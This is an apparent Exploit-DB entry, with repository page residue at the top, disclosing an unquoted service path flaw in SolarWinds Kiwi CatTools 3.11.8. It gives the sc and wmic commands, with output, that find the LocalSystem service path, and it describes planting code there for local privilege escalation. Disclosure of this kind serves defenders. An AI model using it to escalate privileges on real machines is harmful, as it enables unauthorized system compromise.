3e8f9f4d30
2 changes to exploits/shellcodes SolarWinds Kiwi CatTools 3.11.8 - Unquoted Service Path TextPattern CMS 4.8.7 - Remote Command Execution (RCE) (Authenticated)
38 lines
No EOL
1.3 KiB
Text
38 lines
No EOL
1.3 KiB
Text
# Exploit Title: SolarWinds Kiwi CatTools 3.11.8 - Unquoted Service Path
|
|
# Exploit Author: Mert DAŞ
|
|
# Version: 3.11.8
|
|
# Date: 14.10.2021
|
|
# Vendor Homepage: https://www.solarwinds.com/
|
|
# Tested on: Windows 10
|
|
|
|
# Step to discover Unquoted Service Path :
|
|
|
|
--------------------------------------
|
|
C:\Users\Mert>sc qc CatTools
|
|
[SC] QueryServiceConfig SUCCESS
|
|
|
|
SERVICE_NAME: CatTools
|
|
TYPE : 10 WIN32_OWN_PROCESS
|
|
START_TYPE : 2 AUTO_START
|
|
ERROR_CONTROL : 1 NORMAL
|
|
BINARY_PATH_NAME : C:\Program Files (x86)\CatTools3\nssm.exe
|
|
LOAD_ORDER_GROUP :
|
|
TAG : 0
|
|
DISPLAY_NAME : CatTools
|
|
DEPENDENCIES :
|
|
SERVICE_START_NAME : LocalSystem
|
|
---------------------------------------------
|
|
|
|
Or:
|
|
-------------------------
|
|
C:\Users\Mert>wmic service get name,displayname,pathname,startmode |findstr
|
|
/i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """
|
|
----------------------
|
|
|
|
#Exploit:
|
|
|
|
A successful attempt would require the local user to be able to insert
|
|
their code in the system root path undetected by the OS or other security
|
|
applications where it could potentially be executed during application
|
|
startup or reboot. If successful, the local user's code would execute with
|
|
the elevated privileges of the application. |